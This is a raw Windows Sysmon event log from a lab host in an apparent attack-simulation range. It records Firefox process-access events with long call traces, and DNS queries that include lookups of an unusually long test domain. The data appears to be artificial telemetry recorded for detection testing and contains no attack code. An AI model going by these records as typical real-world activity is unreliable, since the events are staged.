Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.158{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:06.111{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.111{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 22542200x800000000000000018217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.762{59A5CD1D-8E56-6005-2E00-00000000A301}246442.107.75.147.in-addr.arpa.0type: 12 lbadstorm-pk-nj-102;C:\Windows\sysmon64.exe 22542200x800000000000000018216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.721{59A5CD1D-8E56-6005-2E00-00000000A301}246411.164.228.46.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.687{59A5CD1D-8E56-6005-2E00-00000000A301}2464141.88.79.104.in-addr.arpa.0type: 12 a104-79-88-141.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.682{59A5CD1D-8E56-6005-2E00-00000000A301}24649.119.22.2.in-addr.arpa.0type: 12 a2-22-119-9.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.681{59A5CD1D-8E56-6005-2E00-00000000A301}2464159.242.31.52.in-addr.arpa.0type: 12 
ec2-52-31-242-159.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.681{59A5CD1D-8E56-6005-2E00-00000000A301}2464173.141.246.34.in-addr.arpa.0type: 12 ec2-34-246-141-173.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.680{59A5CD1D-8E56-6005-2E00-00000000A301}2464132.164.154.54.in-addr.arpa.0type: 12 ec2-54-154-164-132.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.680{59A5CD1D-8E56-6005-2E00-00000000A301}2464129.161.211.23.in-addr.arpa.0type: 12 a23-211-161-129.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.028{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com031.193.128.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.027{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com0::ffff:31.193.128.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:07.860{59A5CD1D-8E56-6005-2E00-00000000A301}246445.128.193.31.in-addr.arpa.0type: 12 ns.nothingtoseehere.org;C:\Windows\sysmon64.exe 22542200x800000000000000018226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.426{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 
10341000x800000000000000018230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:20.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program 
Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:20.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program 
Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla 
Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.110{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla 
Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.110{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.859{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla 
Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.855{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.794{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.790{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla 
Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.784{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.778{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla 